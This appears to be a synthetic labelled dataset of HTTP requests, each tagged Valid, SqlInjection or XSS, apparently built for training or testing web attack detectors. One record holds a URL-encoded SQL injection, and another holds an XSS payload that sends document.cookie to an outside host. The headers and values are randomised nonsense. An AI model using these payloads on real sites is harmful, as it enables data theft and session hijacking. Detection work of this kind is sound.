Trailer: Proxy-Authorization
User-Agent: krhsseo
UA-CPU: x86
UA-Disp: 4878,467,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 0187x7765
Via: 16t/3.2 www.poqy.jpeg, FTP/7.1 161.36.28.21:74239, 1.1 148.224.135.64:96263
Transfer-Encoding: compress
Upgrade: trhg/2.1, seo/5.1, psppa/1.2
Warning: 229 3.87.67.188:155 "rolabuAsnlbse" "Mon, 12 Sep 05 12:07:12 GMT"
X-Forwarded-For: 92.249.204.222
X-Serial-Number: 131925
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lns0vnrzfydsom=30381945&1istntLifd=rcpsat=9m&dJ9=8&iponssmeednaynx=634&UZJx3=lgex2pe

End - Id: 33018
Start - Id: 33140
class: Valid
POST /kednaZ/sitinmSr/csE9i3sonpomi/iR-5urRaY/ec/nO4UHm@Mn1F/1@IR/w1D.UbflPdVnHud.jpg? HTTP/1.1
Content-Length: 299
Content-Language: eWdjt,ith
Content-Encoding: gzip
Content-Location: /erSa/tprl/eaHTi.zip
Content-MD5: dGR1aUEyb2xvYUFtcGVjYw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 01 Jul 09 08:40:17 GMT
Last-Modified: Sat, 28 Oct 06 18:40:58 CET
Host: 32.2.115.210:4
Connection: ytoS
Accept: */*;q=0.8
Accept-Charset: windows-1258, x-mac-japanese, windows-1255;q=0.3, cp-950;q=0.4, x-mac-greek
Accept-Encoding: compress;q=0.3
Accept-Language: *;q=0.7
Cache-Control: osokikl=tna8
Client-ip: 156.100.161.187
Cookie: noiomsip=hef;Ot9aehgme=3215860;D_by=419379501;w2=5;BApHfromI=ed
Cookie2: $Version="653"
Date: Tue, 16 May 06 15:02:54 CET
ETag: "CIYpvMZBh6R6qvtRRp"
Expect: 100-continue
From: da5Aamnq@DilRnio.gov
If-Modified-Since: Sun, 16 Jul 06 11:10:06 GMT
If-Unmodified-Since: Tue, 09 Jun 09 03:57:53 GMT
If-Match: "U3IZYxHpJFoHa27H5"
If-None-Match: *
If-Range: Wed, 24 Mar 10 08:33:34 GMT
Max-Forwards: 39
MIME-Version: 6.2
Pragma: hubnenht='1nrabsfu'
Proxy-Authorization: Digest uri=/EsalneHn/dnt3tE/TaleA/I69rtf/t3aeua.php3
Authorization: aSlz ned2=tsclenc
Range: -7476
Referer: http://www.faotO2hh.cz/t3eEiaef.jpeg
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: ontrntekmYlom8etyen
UA-CPU: MIPS
UA-Disp: 879,680,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6581x441
Via: 1.0 109.88.25.153, HTTP/3.1 194.108.12.173
Transfer-Encoding: identity
Upgrade: ovT/9.9, reD/3.1, eel/0.6, oeey/7.8, u2uyl/8.8
Warning: 541 www.lrooltb.jpg "eaO7ssg4nbeu" 
X-Forwarded-For: 92.19.31.36
X-Serial-Number: 0421946796861302632
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

btt6bhlmp=dtbs8ti9heenhtmp&aer= fd&at=952984&jdeOzj5hiade0U=\Ps&oe1rcn4obt=eeie&hlK63systemgp79G=rV0-C0ssRC8z&ehdal7VsG0i=+?wzo>libiI&epntud64weix=eovpassthrun4lo&dnodeh4FH=741910671&frdaeC5l19gE0=ro3n0n+netcath&VzZ5yvbscriptScmdID=844&qosst=odd e&PBxqyfwSr=02720117&Bf.41H0JpsTwv=ereilink

End - Id: 33140
Start - Id: 910
class: Valid
GET /fYLm_C9PC66jrx4ynKX/bd-ajuN2Og@52zR/ntzcmIibnN/hcmgecoRycoua5/j1@wX.JFo/fkP@-K7Z7A9/Reedcroloao/1NJ2wRZs/dbesytslGlnx8iwptOX/mIer/cdt2dakIYhoiz8dhip/edcn1olb.tiff? HTTP/1.0
Host: 255.52.184.99
Connection: keep-alive
Accept: video/mpeg;q=0.4, video/mpeg
Accept-Charset: *
Accept-Encoding: gzip;q=0.0
Accept-Language: 4mhlae-qno, zds-on;q=0.9
Cache-Control: no-store
Client-ip: 54.96.225.26
Cookie: ssEftoa1sf1ax=lochttpeJ7 9scripte0ycopyl>dmibody;Ieoxomoefne4hn=ie;eRnieemeygni1r=hhtanvhnir;gyShguTihae=o@f;mexjelehshdroe=7;4vl6es.51I=?iicle
Cookie2: $Version="98"
Date: Thu, 05 Feb 09 14:21:52 UTC
ETag: "33HcNbBNC1HdtlHTdYe"
Expect: 100-continue
From: njNas@wal1m.uk
If-Modified-Since: Fri, 07 Nov 08 11:08:04 UTC
If-Unmodified-Since: Wed, 02 Sep 09 01:16:55 GMT
If-Match: "LpK@vkpRu97cmyzg_q"
If-None-Match: "iRdYS0NmnZokpzCzzT"
If-Range: *
Max-Forwards: 30
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest uri=http://apeo.fr/nenaohpr/utnBni/Eeor/utbwemst.dll
Authorization: Basic UnRldDpyaXIzRTM=
Range: 6-,8198-40078
Referer: /acwKtrno/lsftelm/ho2or9s/ehueatu.swf
TE: trailers
Trailer: If-Match
User-Agent: eqeennottDbuw
UA-CPU: PowerPC
UA-Disp: 1003,145,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 1573x8135
Via: 6.6 www.gruSfyAf.jpeg:5, 3.9 www.sjhajt.js
Transfer-Encoding: ei46; Fuse=h0Tnhs
Upgrade: iehx1/0.3, ohanrn/8.7, 0ph/6.5, RaOe/2.8
Warning: 020 www.rnasi.htm "efazM1mttcshlaeedu" "Tue, 29 Jan 08 23:57:59 GMT"
X-Forwarded-For: 145.115.206.7
X-Serial-Number: 510626783025324042
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 910
Start - Id: 41746
class: SqlInjection
GET /etagnLoctAtectnnm/.foD7vvR/s1t5oloixNResmahgw/njFwMj/NH/mostoneAe.mspx?rrikteNs=srhnea&u9oportnqretd=oHc&eer2ytrwxtt2=0&TlK-Cz0Cacceptm=%27++UNION+++++++++++ALL+++++++++++++SELECT++++enWiatsri+++++FROM+++++ura9t3l+WHERE+%27%27+%3D++++%27&erwl=9&rf1iuoruw=fNoecdyK&shinusfp=5Aexas&setLr=opP&qtnu=33591&ZhMm@_A4JAx=otghhsasthls&bpa55m4I1do9lfn=lsOITfm&hFh@=mne&teea3ohot4=crnullstsg%5Dh5&TkTGXshutdownBz9R=amF&uToposition23Bf-wUk=5tsiLNa8dIkhbMTsri HTTP/1.0
Host: 232.158.5.175:38
Connection: nDlzstad
Accept: */*;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.7
Accept-Language: H2aini-fl6nnexi, emh-bsrz;q=0.1
Cache-Control: min-fresh=66844
Client-ip: 141.207.49.218
Cookie: bea=15
Cookie2: $Version="873"
Date: Sat, 23 May 09 15:51:22 UTC
ETag: "UVxosaB2xCH2mpUKt0jR"
Expect: ih2Wcxj
From: AEeu@io5oeTS.be
If-Modified-Since: Thu, 23 Jun 05 17:50:39 CET
If-Unmodified-Since: Sun, 17 Dec 06 22:25:36 UTC
If-Match: "-Ls_agbPEl6Cu_f1aFi"
If-None-Match: *
If-Range: Fri, 01 Jul 05 07:37:06 CET
Max-Forwards: 68
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic cmllaHR0YnQ6dHJlMg==
Authorization: Basic T2lvaW5zMzpubmFmbA==
Range: -69404,-1
Referer: http://eavie.gov/2scprrnt/rhxrCg/semilcv/dehrlg7a.pdf
TE: trailers
Trailer: TE
User-Agent: ensd5t/2.5
UA-CPU: 68000
UA-Disp: 570,952,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 0666x357
Via: truans/0.5 www.aedhm.gif, 8.8 www.WafeAin.html:76873, HTTP/7.6 5.8.6.135
Transfer-Encoding: compress
Upgrade: mer/2.9, hitWop/2.4, vtjw/1.7, otte/3.2
Warning: 878 www.6sn3l.shtml "noyalXfnbpe" "Wed, 14 Sep 05 14:01:16 CET"
X-Forwarded-For: 208.165.185.87
X-Serial-Number: 81915611891
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41746
Start - Id: 16584
class: Valid
GET /uOefcImHsicH/crmSTamp2eotlz4o/TntsSsodo8.dll?7SohoA3ac9qd=3e&vcyrw=5&zyJiH4B=7&Tfr=tmum3bmtCYNEcT&Hl=osupdaten0a&oissbehoer2Z2id=t7lkwPVZ&aaeRgeisgj=lu%40&teybHutmx=tiHKMzt&W6.o=xpopjO7H_V&esrwlj3erheei=297&aiieehdetQlet=7531&1i1elcNaNS=oite+ihr5ile4 HTTP/1.1
Host: 245.7.36.120
Connection: nThbsst
Accept: video/*, video/quicktime;q=0.4, text/*;q=0.4
Accept-Charset: x-mac-chinesesimp, x-mac-turkish;q=0.1, x-mac-roman;q=0.7, x-mac-chinesesimp
Accept-Encoding: *
Accept-Language: ii-Ohdlxs;q=0.2, tfek-pstOonr;q=0.7, bw-yaief, o-8ydr
Cache-Control: no-cache
Client-ip: 178.183.34.48
Cookie: ElvEj3Qcmd@IH=[h;mnloxpssds=134;rn7Tod= 'O;obntsmfiosOo0i=rf37aplS;P2fSjN=mieMedpygeen
Cookie2: $Version="3"
Date: Sat, 29 Apr 06 06:20:43 GMT
ETag: "xIL5214d.C@P9ihIOvZ"
Expect: ehorse
From: o7mnatoB@rrengt.ch
If-Modified-Since: Tue, 19 Dec 06 18:23:58 CET
If-Unmodified-Since: Fri, 21 Sep 07 03:15:49 GMT
If-Match: "4r_yJxrrA8bSlNZnjj"
If-None-Match: *
If-Range: Thu, 30 Mar 06 04:11:23 UTC
Max-Forwards: 2
MIME-Version: 4.7
Pragma: a='eco'
Proxy-Authorization: Basic dHRhRWVvdDoydGViRWUydQ==
Authorization: rD0oSh clsswh=3inrn
Range: -098113
Referer: http://www.pbhiei.biz/yapdiei/sinhs/aobd.sh
TE: chunked
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.6 (Windows; U; WinNT 7.3; go-oo; rv:0.0.1) Gecko/74086913
UA-CPU: 68000
UA-Disp: 270,3483,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 7789x534
Via: cetaw/3.4 18.93.44.218:32
Transfer-Encoding: gzip
Upgrade: bio/9.9, meemh/5.8, i7a/5.8, 6bvd/6.9
Warning: 295 www.istr9im.png "lznh" "Sat, 11 Apr 09 07:31:57 CET"
X-Forwarded-For: 184.226.48.9
X-Serial-Number: 4070028617537255
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 16584
Start - Id: 12891
class: Valid
GET /u_V-joR2EF.brLwg/4JZQSK/a41PzsFs@1_.tiff?reb=m%5Dl+uqhESl+&pn=ck_p&ifdues4e=mpmnt+llogVteo&t8ayswtnmt=367643 HTTP/1.0
Host: www.1otyTf.de
Connection: rCutWao
Accept: audio/*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: E-Cnan, adrxs9-lrrirw, ekhe-h;q=0.8, oE-4hkNes
Cache-Control: only-if-cached
Client-ip: 138.179.154.230
Cookie: tt1TeeauedhnM=323
Cookie2: $Version="3"
Date: Thu, 13 May 04 12:24:58 GMT
ETag: "L59RFNPtyIMPynvt4SDP"
Expect: 100-continue
From: ngeagi8r@t1t7.com
If-Modified-Since: Mon, 12 Apr 04 12:13:40 UTC
If-Unmodified-Since: Mon, 20 Mar 06 12:59:01 CET
If-Match: "WDRtgYhLt@Zy55T"
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Basic ZWhlOHBhYmk6b29tM29l
Authorization: a6pi WMth=szlrs
Range: 976-,-97584
Referer: /m6sfoX2s/coca/hhahee/pu1e/htseie.sh
TE: deflate
Trailer: Pragma
User-Agent: qaagw3o/6.9.2.2.2
UA-CPU: StrongARM
UA-Disp: 769,338,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 8835x5264
Via: HTTP/4.4 www.ao1n9.html:659, 8.3 124.3.255.113:3
Transfer-Encoding: gzip
Upgrade: ioeah/7.8, nuq/3.5, nnm/0.8
Warning: 657 108.119.89.134 "n3Eimiaj3lnutimDg" 
X-Forwarded-For: 216.6.120.104
X-Serial-Number: 4907746729509688
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12891
Start - Id: 47929
class: XSS
GET /nsnmra/fHj/t2PBbWBh5dzUEsa/tdHossm7mds7P9ouem/Z.A/tras80loaansu.jsp?ZVxiduKVhvNw=mochal&e8=oZI47Jy_u9x&rmt5T3pUe7uaRE=oxwrfzsoIatRfromt&eAO3t3etaao=%3Cstyle+++%3E%3C%21--%3C%2Fstyle%3E%3Cscript%3E%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.ol.com%2Fcgi-bin%2Fma.cgi%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript+++%3E HTTP/1.0
Host: 9.253.144.6
Connection: close
Accept: image/png
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: eTto-etnit;q=0.8, oolte3-s;q=0.4, aRskw-t0ntcrge;q=0.4, iifife-l, atTiEl-eqjo;q=0.2
Cache-Control: no-transform
Client-ip: 245.183.71.49
Cookie: Hp5=c ;yitwdyl=4sgen;esc=46987
Cookie2: $Version="613"
Date: Wed, 01 Jul 09 20:13:22 UTC
ETag: W/"zaALvGTogQK3DnCL5"
Expect: on3be5=iadbe;seabhe=eetaKcek
From: T5cc@hrqtf.uk
If-Modified-Since: Thu, 28 Oct 04 09:11:01 UTC
If-Unmodified-Since: Tue, 27 Dec 05 09:22:12 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 07 Aug 07 01:36:24 UTC
Max-Forwards: 37
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: xm5Eoo cesOKwc=keom4
Authorization: Basic c250RGlZaTozZXl1TWxs
Range: -6
Referer: /x5Yf/ttsr/pstbA/njsh.asp
TE: trailers,gzip;q=0.8
Trailer: Max-Forwards
User-Agent: Mozilla/1.8 (compatible; Konqueror/8.4; Windows NT; s6sHgyO; pbsxe)
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 229x467
Via: 9.9 217.215.191.236:77772, 21dee/5.3 www.mhaqwte.jpeg
Transfer-Encoding: gzip
Upgrade: fxd/6.1, eet/0.1, fuo/9.7, elrnan/6.1, mmna/4.6
Warning: 832 www.gaeRu.html "xsaazKzls" 
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 03181480810
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47929
Start - Id: 6463
class: Valid
POST /Sz6ZgIKiaa/hieesroweotlstlsils/Cmdwcaebe0fzstc.sh? HTTP/1.1
Content-Length: 13
Content-Language: nwe,zmemi,9wetxwmC
Content-Encoding: gzip
Content-Location: http://sudr.net/imihRech/lmle/osscnhe.bin
Content-MD5: SXVhd3d1b2ZoZTNlaGpvYw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 27 Nov 09 04:31:23 GMT
Last-Modified: Sat, 16 Apr 05 16:22:28 CET
Host: 106.87.86.21
Connection: hhmeadon
Accept: text/*;q=0.6
Accept-Charset: *
Accept-Encoding: identity;q=0.3, deflate
Accept-Language: drteaznk-hsaw;q=0.7, 6eWioaee-o
Cache-Control: max-stale
Client-ip: 114.91.36.242
Cookie: nAtinswptyt=lrtmpliken;wviePs=dmtepAoeshitnfs;nn8df=6ftpeaosemN<e+i;3H5zPH7=oeImegrn;eRi4waea1ytse=0767
Cookie2: $Version="6"
Date: Sat, 12 Feb 05 05:29:05 GMT
ETag: "7tI@2fJUGsJh4IyYv9Z"
Expect: meta
From: aVFabc@O7fpolootx.be
If-Modified-Since: Wed, 29 Apr 09 15:52:38 GMT
If-Unmodified-Since: Wed, 27 Jan 10 12:45:42 CET
If-Match: "yTcUyxx@dgGnFbD8Xu@"
If-None-Match: "LiQO4Dg7zrSC54s2l"
If-Range: "OO0h247amDR7OxicFCwK"
Max-Forwards: 4852
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest opaque="ubcgwtq"
Range: 35260-775435,47-,92-626366
Referer: /yo3auon/2ibe/cdI8g.jpeg
TE: trailers,trailers,trailers
Trailer: From
User-Agent: niob/9.7.5.5
UA-CPU: 68000
UA-Disp: 0332,310,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 018x626
Via: 1.0 www.eBts.jpeg:0, 7.4 www.yjmoi.htm, 7.3 69.143.147.18
Transfer-Encoding: deflate
Upgrade: rr6/2.2, e3Shey/7.8, nrdxI/1.5
Warning: 447 37.2.170.213 "8reqteinidDfS9tu7r6" "Mon, 13 Mar 06 18:40:21 UTC"
X-Forwarded-For: 218.75.218.198
X-Serial-Number: 6200132092140474
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mtkfhnoj=9578

End - Id: 6463
Start - Id: 34852
class: Valid
PUT /l4/wfwE.P/UmDosfOTrfoo/l1RoW/pAty/qrwztatshihs/sziwH33y0i@wV7U6/-eC5X@c4g_5iXLimg/izIdEGepFFa5YQt_q7.htm? HTTP/1.1
Content-Length: 41
Content-Language: c7mrt,mrI
Content-Encoding: identity
Content-Location: /amtr/rafu9.php
Content-MD5: YW5hbnRhNWhMaG1oc3BNRQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 25 May 05 15:02:15 UTC
Last-Modified: Fri, 24 Feb 06 21:34:38 UTC
Host: 76.79.38.108
Connection: keep-alive
Accept: video/*;q=0.6, text/*
Accept-Charset: *;q=0.3
Accept-Encoding: compress, compress;q=0.2, deflate, gzip
Accept-Language: reb-AEz, Tana-aconil;q=0.1, 72sek-tnufe;q=0.8, rcIknH-ev, aloe-hoiNr;q=0.8
Cache-Control: d=srrDh1n
Client-ip: 217.66.243.25
Cookie: 5rnd0ruAvC=SE;lsit23aisgeOo3=rw8A_C;tlcraSEesg=samih
Cookie2: $Version="17"
Date: Mon, 27 Nov 06 16:09:06 GMT
ETag: "fW8R6n0BEooK0IFAoyX"
Expect: b9eae
If-Modified-Since: Fri, 05 Dec 08 04:05:50 UTC
If-Unmodified-Since: Thu, 20 Nov 08 13:21:30 GMT
If-Match: *
If-None-Match: "G608Mh@H6MifKBLOslN"
If-Range: *
Max-Forwards: 0936
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: piRse 36rh0obt=bannf
Authorization: Basic YWllbjphbmJ6
Range: 2080-348,-39473,7-
Referer: /a0udejrs.asmx
TE: trailers,deflate;q=0.5,gzip;q=0.4
Trailer: If-Range
User-Agent: doqAgdNly
UA-CPU: MIPS
UA-Disp: 7834,731,16
UA-Pixels: 867x132
Via: FTP/5.2 www.crenl.shtml:743, 8.0 31.139.229.212
Transfer-Encoding: hpughe; If4nEBnv=7tjAtiu
Warning: 252 52.60.83.67 "gsw0us7t70cfreiHw" "Fri, 06 Aug 04 01:07:38 CET"
X-Forwarded-For: 235.64.29.202
X-Serial-Number: 4783301887030171933
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~

Ut=ru&le9it8mnbeen=u mny&owingll=2r1ujXkn

End - Id: 34852
Start - Id: 4506
class: Valid
POST /tshByaern6cahin/do/sab17Ul.cfm? HTTP/1.1
Content-Length: 71
Content-Language: Thh,NecsCa,cs
Content-Encoding: gzip
Content-Location: /qDnbyly/8taypzrt.nsf
Content-MD5: RXFzc2hvb2k0anhsMGVyaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 20 Jan 06 04:26:34 CET
Last-Modified: Sat, 29 Aug 09 13:08:43 UTC
Host: www.Tve4shu9Or.ch
Connection: keep-alive
Accept: image/jpeg;q=0.4, video/*, application/*;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 211.161.242.52
Cookie: Iukx6iimxE=8876996894;yitnyr4mc9o8i=712878
Cookie2: $Version="3"
Date: Wed, 06 Jan 10 04:46:31 GMT
ETag: W/"FmO6gXImXaVVwhaW4p6@"
Expect: wRtte
From: epetho@ahrgiexdr.gov
If-Modified-Since: Thu, 24 Jun 04 12:16:12 UTC
If-Unmodified-Since: Thu, 31 Mar 05 22:57:40 GMT
If-Match: "BLwD9iMqK07S2rMcNM"
If-None-Match: *
If-Range: Thu, 07 May 09 10:52:10 UTC
Max-Forwards: 16
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: d6nso iofjtqph=imodlsXg
Authorization: Basic dnlzbWFsOnRyc25uaHQ=
Range: 48-
Referer: http://www.thhX.fr/6uLwfss/ietseo5/r6tr.bin
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/8.0 (compatible; pbaios5f; Unix; ubse)
UA-CPU: PowerPC
UA-Disp: 9080,142,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 654x7846
Via: hrprM/5.7 www.yoetht.shtml, 9.4 www.pjaila.tiff, 8.8 245.123.43.198
Transfer-Encoding: gzip
Upgrade: aensr/9.0, tag/3.6
Warning: 842 189.66.165.24 "ccUelchs9dtqh" 
X-Forwarded-For: 165.210.32.151
X-Serial-Number: 94649830551806
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

xsnee=a&r&rel=oaauto1itri3&ieasrleRodnc=r;msrrr&ntispaiean1qnoi=pXV

End - Id: 4506
Start - Id: 20770
class: Valid
GET /r7O5J4ypKrrl/ntinor16oz/9NqQ/d5rh3od/4kb7jcWUWXNYxW8pFXuA/tbmdaomaocuipsqb/r_LY_kRA52Aa/NZgjuxlogV/Tuoan2sftOzri/nC4iGEnNUviaalO/d26cPCUddh-mMq8h/mj0OrMI9IvwF.gif?usnnntt0=Hoiesj%5DT&EL4eP=iiNrenliiOt0 HTTP/1.1
Host: www.yvre05qt.cz
Connection: coetjwer
Accept: text/xml, video/quicktime;q=0.5, image/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: k-a, cegad-hutsotmi;q=0.7
Cache-Control: max-stale=0
Client-ip: 136.97.56.27
Cookie: 973swdhDjk=it82anaeem;sdoaei=7956
Cookie2: $Version="416"
Date: Wed, 28 Sep 05 24:30:14 UTC
ETag: W/"qfJA0jbXXdDwigNHh"
Expect: 5dide
From: txeT@aevntoegn.com
If-Modified-Since: Mon, 10 Oct 05 07:52:14 CET
If-Unmodified-Since: Tue, 17 Aug 04 16:02:11 UTC
If-Match: *
If-None-Match: "sA2Q2slyJ-m3fYw"
If-Range: Sun, 19 Sep 04 06:31:08 GMT
Max-Forwards: 5606
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic dDJhMDpJdGxlZWFo
Authorization: hEyt naaVe1=pedtk
Range: 68-16
Referer: /ihZyieq/e8eG/ecllem/3eeeheql.tiff
TE: trailers,trailers
Trailer: If-Range
User-Agent: dSEMainotw5
UA-CPU: StrongARM
UA-Disp: 369,7940,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2236x546
Via: 9.6 www.dftuI.js, FTP/9.6 181.214.233.142, tsn/5.0 98.253.177.32
Transfer-Encoding: identity
Upgrade: ichhc/3.2
Warning: 220 www.htxyn.js:56846 "tipspynata3kBht" "Tue, 15 Sep 09 04:06:34 CET"
X-Forwarded-For: 174.119.33.87
X-Serial-Number: 0880116781853820645
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20770
Start - Id: 21543
class: Valid
GET /IuS/xinbV5N@NOefq6O/hq6LgCS1u4/eAHhB/lB/eOHFLg/e6/e_qnXfjFZlwZEOLAF.aspx?apge9=m4JoOFT&opndaceEte1afGs=Hdeaoservicesgo&eaanezuon=6807520461&jxQvPwEz=87732810&boibest=541&slsbh=eDQsKqz&h8oe=54&HGoTw=tvfiTrHe4nG&LiwsIs=ornrric&lewhhds=to&t2dii8ivnHu=Eihometlinkermh%24%3A&.zzmbetween_3g_Wm=l8Vkr&5Z0xNrmM=9237143 HTTP/1.1
Host: www.Zeshe.st:8969
Connection: keep-alive
Accept: application/*;q=0.9
Accept-Charset: big5;q=0.8, iso-8859-8-i, windows-1258;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 145.238.161.146
Cookie: sezawu=08
Cookie2: $Version="2"
Date: Tue, 22 Sep 09 16:11:16 GMT
ETag: W/"WTrMFwae4lFvrtp87"
Expect: gbwyar=satiq;eyeth
From: t1Gpd0t@aonx3yb.biz
If-Modified-Since: Wed, 05 Apr 06 23:40:18 UTC
If-Unmodified-Since: Tue, 25 Mar 08 18:21:00 GMT
If-Match: "GdutYmaLR2.tCwC"
If-None-Match: *
If-Range: *
Max-Forwards: 914
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: NTLM YnQ4bmh5OGg0dFFybG5kcjVnYWVldHVjaXdlY25lbGF0
Authorization: Basic ZDNvNWV1eHQ6Z285dA==
Range: 2514-,-4567,968-760
Referer: /ennoloan/c3Seek.tiff
TE: trailers,trailers
Trailer: Referer
User-Agent: Mozilla/1.9 (Machintosh; U; PPC 4.1; ys-7r; rv:6.4.0) Gecko/47786399
UA-CPU: StrongARM
UA-Disp: 9153,8066,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 0542x2765
Via: FTP/8.2 www.dauteL.png:4
Transfer-Encoding: hndh; tetr=1granah
Upgrade: dmh/1.5, elpleh/2.3, bhbR/2.5, axes/9.3
Warning: 105 194.179.101.101:797 "yfe4eht3aAartosoia" "Tue, 19 Jul 05 17:23:33 GMT"
X-Forwarded-For: 225.114.104.225
X-Serial-Number: 42015
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21543
Start - Id: 3373
class: Valid
GET /sOy3tV6jI.xn1/gnRhrfoidcrriilbtmh0/ugXJf8AxZhff/GUA1bj4ZL5/owhp/92cTn/YWodsamtKorrXW/xuh2bocol/3xtsCS1/7XZwZDOf/E9Y.dll?ettrcx1lqsta=2ItesfgahciCESrrmo&oddmns=httpee%40fyie&aTet=26591&ejbNetcP2Ns=032169&wnttz=soxEi3rebyroUa&FuNa-WCsiRz=wtEsSwEocLwhyd&p6coh1reteshwTe=31 HTTP/1.1
Host: www.sH8taVr.de
Connection: close
Accept: text/*, image/*, audio/basic;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: max-age=02114
Client-ip: 241.173.41.168
Cookie: eoemoaoc2tynO=heochildOPztmpr;S1G3htaccesgkVcopy=Uyigea]:t6S/usrfRe 
Cookie2: $Version="2"
Date: Fri, 22 Dec 06 02:38:07 CET
ETag: "KTZQQj7JqDfCVkbxwi"
Expect: 100-continue
From: mEt7Rt@xbaiymu.st
If-Modified-Since: Thu, 08 Jul 04 04:12:00 UTC
If-Unmodified-Since: Sun, 04 Jan 09 05:37:02 GMT
If-Match: *
If-None-Match: "98oQ@QmDz1A8NeOyT1hE"
If-Range: *
Max-Forwards: 2
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic am1YaThzdHQ6MWFtYWEyOA==
Authorization: Digest nc=C5309BbD
Range: 65294-
Referer: http://www.qooesey.cz/3t2eshv/lA2loa/nniuoemo/nowHGp/lken1.jpeg
TE: trailers,chunked,gzip;q=0.8
Trailer: Via
User-Agent: teIuia/1.0.2.4
UA-CPU: MIPS
UA-Disp: 351,552,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 0842x046
Via: 2.7 153.12.78.154, FTP/4.8 112.225.197.228, 0.6 111.124.75.228
Transfer-Encoding: deflate
Upgrade: lttl/0.0, cbiy/2.9
Warning: 873 1.206.34.142:2 "iehsLoeRm4h" "Mon, 06 Jul 09 01:55:19 CET"
X-Forwarded-For: 253.99.67.7
X-Serial-Number: 8869070380
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3373
Start - Id: 33785
class: Valid
POST /i6M@rxgZ.y72GMEw2LLY/denn/opnnsddsa/hjsJSOp1_2nnPIfF0aG/hfs1a/eiebnwes.asp? HTTP/1.1
Content-Length: 288
Content-Language: a
Content-Encoding: identity
Content-Location: http://trtr9h.org/ttz2o3/fiuCer.php3
Content-MD5: aWxhaW0xdGVlbmNReGFoUA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 04 Nov 07 04:00:34 CET
Last-Modified: Thu, 26 Apr 07 21:42:01 UTC
Host: 157.51.244.91
Connection: 9wwxw9ys
Accept: audio/*;q=0.1
Accept-Charset: windows-1258;q=0.3, windows-1258;q=0.0, iso-10646-ucs-2, cp-932
Accept-Encoding: identity;q=0.6, compress;q=0.5, compress
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 165.218.61.59
Cookie: cldre2tta=0naWgSC2BtD;ahreioee8tetpts=0743;kobc=44;tn1ahtutcucgs=249
Cookie2: $Version="14"
Date: Sat, 08 Sep 07 13:51:33 GMT
ETag: W/"JQn0iddRThZH-WfaUnK_"
Expect: c9cyhx
From: hoHei@sTshLltba.st
If-Modified-Since: Tue, 11 Nov 08 04:58:03 GMT
If-Unmodified-Since: Mon, 16 May 05 02:02:01 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 39
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: dnar oricoou=Orhtma
